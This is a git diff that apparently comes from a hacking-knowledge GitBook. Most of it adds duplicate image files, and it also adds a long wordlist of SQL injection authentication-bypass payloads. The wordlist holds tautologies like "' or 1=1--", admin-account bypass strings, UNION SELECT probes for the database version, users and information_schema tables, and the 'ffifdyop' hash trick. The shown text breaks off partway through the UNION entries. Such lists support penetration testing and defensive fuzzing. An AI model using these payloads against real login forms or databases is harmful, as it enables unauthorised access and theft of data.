diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (1).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (1).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (10).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (10).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (10).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (11).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (11).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (11).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (12).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (12).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (12).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (13).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (13).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (13).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (14).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (14).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (14).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (2).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (2).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (3).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (3).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (3).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (4).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (4).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (4).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (5).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (5).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (5).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (6).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (6).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (6).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (7).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (7).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (7).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (8).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (8).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (8).png differ diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (9).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (9).png new file mode 100644 index 00000000..4c4968b4 Binary files /dev/null and b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1) (1) (9).png differ diff --git a/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png new file mode 100644 index 00000000..5c489261 Binary files /dev/null and b/.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png new file mode 100644 index 00000000..007459da Binary files /dev/null and b/.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1).png new file mode 100644 index 00000000..b2fe24f4 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (2).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (2).png new file mode 100644 index 00000000..b2fe24f4 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (3).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (3).png new file mode 100644 index 00000000..b2fe24f4 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (3).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (4).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (4).png new file mode 100644 index 00000000..b2fe24f4 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (4).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (5).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (5).png new file mode 100644 index 00000000..b2fe24f4 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (5).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (6).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (6).png new file mode 100644 index 00000000..b2fe24f4 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (6).png differ diff --git a/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (7).png b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (7).png new file mode 100644 index 00000000..b2fe24f4 Binary files /dev/null and b/.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (7).png differ diff --git a/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png new file mode 100644 index 00000000..a8a225c8 Binary files /dev/null and b/.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1).png b/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1).png new file mode 100644 index 00000000..fa1f7424 Binary files /dev/null and b/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (2).png b/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (2).png new file mode 100644 index 00000000..fa1f7424 Binary files /dev/null and b/.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1).png b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1).png new file mode 100644 index 00000000..574ff118 Binary files /dev/null and b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (2).png b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (2).png new file mode 100644 index 00000000..574ff118 Binary files /dev/null and b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1).png new file mode 100644 index 00000000..687c4435 Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (2).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (2).png new file mode 100644 index 00000000..687c4435 Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (3).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (3).png new file mode 100644 index 00000000..687c4435 Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (3).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (4).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (4).png new file mode 100644 index 00000000..687c4435 Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (4).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (5).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (5).png new file mode 100644 index 00000000..687c4435 Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (5).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1).png new file mode 100644 index 00000000..5ec5cf81 Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (2).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (2).png new file mode 100644 index 00000000..5ec5cf81 Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (3).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (3).png new file mode 100644 index 00000000..5ec5cf81 Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (3).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png new file mode 100644 index 00000000..50fcd35c Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (2).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (2).png new file mode 100644 index 00000000..50fcd35c Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (3).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (3).png new file mode 100644 index 00000000..50fcd35c Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (3).png differ diff --git a/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png new file mode 100644 index 00000000..98efc7f5 Binary files /dev/null and b/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (620) (1) (1) (1).png b/.gitbook/assets/image (620) (1) (1) (1).png new file mode 100644 index 00000000..e2fc218f Binary files /dev/null and b/.gitbook/assets/image (620) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (638) (1) (1) (1).png b/.gitbook/assets/image (638) (1) (1) (1).png new file mode 100644 index 00000000..4e69d4e1 Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (638) (1) (1) (2).png b/.gitbook/assets/image (638) (1) (1) (2).png new file mode 100644 index 00000000..4e69d4e1 Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (2).png differ diff --git a/.gitbook/assets/sqli-authbypass-big (1) (1).txt b/.gitbook/assets/sqli-authbypass-big (1) (1).txt new file mode 100644 index 00000000..5a03da57 --- /dev/null +++ b/.gitbook/assets/sqli-authbypass-big (1) (1).txt @@ -0,0 +1,771 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1′) and '1′='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1′='1– +) or ('1′='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 + +== += +' +" +'-- 2 +'/* +'# +"-- 2 +" # +"/* +'-' +'&' +'^' +'*' +'=' +0'<'2 +"-" +"&" +"^" +"*" +"=" +0"<"2 + +') +") +')-- 2 +')/* +')# +")-- 2 +") # +")/* +')-(' +')&(' +')^(' +')*(' +')=(' +0')<('2 +")-(" +")&(" +")^(" +")*(" +")=(" +0")<("2 + +'-''-- 2 +'-''# +'-''/* +'&''-- 2 +'&''# +'&''/* +'^''-- 2 +'^''# +'^''/* +'*''-- 2 +'*''# +'*''/* +'=''-- 2 +'=''# +'=''/* +0'<'2'-- 2 +0'<'2'# +0'<'2'/* +"-""-- 2 +"-""# +"-""/* +"&""-- 2 +"&""# +"&""/* +"^""-- 2 +"^""# +"^""/* +"*""-- 2 +"*""# +"*""/* +"=""-- 2 +"=""# +"=""/* +0"<"2"-- 2 +0"<"2"# +0"<"2"/* + +')-''-- 2 +')-''# +')-''/* +')&''-- 2 +')&''# +')&''/* +')^''-- 2 +')^''# +')^''/* +')*''-- 2 +')*''# +')*''/* +')=''-- 2 +')=''# +')=''/* +0')<'2'-- 2 +0')<'2'# +0')<'2'/* +")-""-- 2 +")-""# +")-""/* +")&""-- 2 +")&""# +")&""/* +")^""-- 2 +")^""# +")^""/* +")*""-- 2 +")*""# +")*""/* +")=""-- 2 +")=""# +")=""/* +0")<"2-- 2 +0")<"2# +0")<"2/* + + +'oR'2 +'oR'2'-- 2 +'oR'2'# +'oR'2'/* +'oR'2'oR' +'oR(2)-- 2 +'oR(2)# +'oR(2)/* +'oR(2)oR' +'oR 2-- 2 +'oR 2# +'oR 2/* +'oR 2 oR' +'oR/**/2-- 2 +'oR/**/2# +'oR/**/2/* +'oR/**/2/**/oR' +"oR"2 +"oR"2"-- 2 +"oR"2"# +"oR"2"/* +"oR"2"oR" +"oR(2)-- 2 +"oR(2)# +"oR(2)/* +"oR(2)oR" +"oR 2-- 2 +"oR 2# +"oR 2/* +"oR 2 oR" +"oR/**/2-- 2 +"oR/**/2# +"oR/**/2/* +"oR/**/2/**/oR" + +'oR'2'='2 +'oR'2'='2'oR' +'oR'2'='2'-- 2 +'oR'2'='2'# +'oR'2'='2'/* +'oR'2'='2'oR' +'oR 2=2-- 2 +'oR 2=2# +'oR 2=2/* +'oR 2=2 oR' +'oR/**/2=2-- 2 +'oR/**/2=2# +'oR/**/2=2/* +'oR/**/2=2/**/oR' +'oR(2)=2-- 2 +'oR(2)=2# +'oR(2)=2/* +'oR(2)=2/* +'oR(2)=(2)oR' +'oR'2'='2' LimIT 1-- 2 +'oR'2'='2' LimIT 1# +'oR'2'='2' LimIT 1/* +'oR(2)=(2)LimIT(1)-- 2 +'oR(2)=(2)LimIT(1)# +'oR(2)=(2)LimIT(1)/* +"oR"2"="2 +"oR"2"="2"oR" +"oR"2"="2"-- 2 +"oR"2"="2"# +"oR"2"="2"/* +"oR"2"="2"oR" +"oR 2=2-- 2 +"oR 2=2# +"oR 2=2/* +"oR 2=2 oR" +"oR/**/2=2-- 2 +"oR/**/2=2# +"oR/**/2=2/* +"oR/**/2=2/**/oR" +"oR(2)=2-- 2 +"oR(2)=2# +"oR(2)=2/* +"oR(2)=2/* +"oR(2)=(2)oR" +"oR"2"="2" LimIT 1-- 2 +"oR"2"="2" LimIT 1# +"oR"2"="2" LimIT 1/* +"oR(2)=(2)LimIT(1)-- 2 +"oR(2)=(2)LimIT(1)# +"oR(2)=(2)LimIT(1)/* + +'oR true-- 2 +'oR true# +'oR true/* +'oR true oR' +'oR(true)-- 2 +'oR(true)# +'oR(true)/* +'oR(true)oR' +'oR/**/true-- 2 +'oR/**/true# +'oR/**/true/* +'oR/**/true/**/oR' +"oR true-- 2 +"oR true# +"oR true/* +"oR true oR" +"oR(true)-- 2 +"oR(true)# +"oR(true)/* +"oR(true)oR" +"oR/**/true-- 2 +"oR/**/true# +"oR/**/true/* +"oR/**/true/**/oR" + +'oR'2'LiKE'2 +'oR'2'LiKE'2'-- 2 +'oR'2'LiKE'2'# +'oR'2'LiKE'2'/* +'oR'2'LiKE'2'oR' +'oR(2)LiKE(2)-- 2 +'oR(2)LiKE(2)# +'oR(2)LiKE(2)/* +'oR(2)LiKE(2)oR' +"oR"2"LiKE"2 +"oR"2"LiKE"2"-- 2 +"oR"2"LiKE"2"# +"oR"2"LiKE"2"/* +"oR"2"LiKE"2"oR" +"oR(2)LiKE(2)-- 2 +"oR(2)LiKE(2)# +"oR(2)LiKE(2)/* +"oR(2)LiKE(2)oR" + +admin +admin'-- 2 +admin'# +admin'/* +admin"-- 2 +admin"# +ffifdyop + +' UniON SElecT 1,2-- 2 +' UniON SElecT 1,2,3-- 2 +' UniON SElecT 1,2,3,4-- 2 +' UniON SElecT 1,2,3,4,5-- 2 +' UniON SElecT 1,2# +' UniON SElecT 1,2,3# +' UniON SElecT 1,2,3,4# +' UniON SElecT 1,2,3,4,5# +'UniON(SElecT(1),2)-- 2 +'UniON(SElecT(1),2,3)-- 2 +'UniON(SElecT(1),2,3,4)-- 2 +'UniON(SElecT(1),2,3,4,5)-- 2 +'UniON(SElecT(1),2)# +'UniON(SElecT(1),2,3)# +'UniON(SElecT(1),2,3,4)# +'UniON(SElecT(1),2,3,4,5)# +" UniON SElecT 1,2-- 2 +" UniON SElecT 1,2,3-- 2 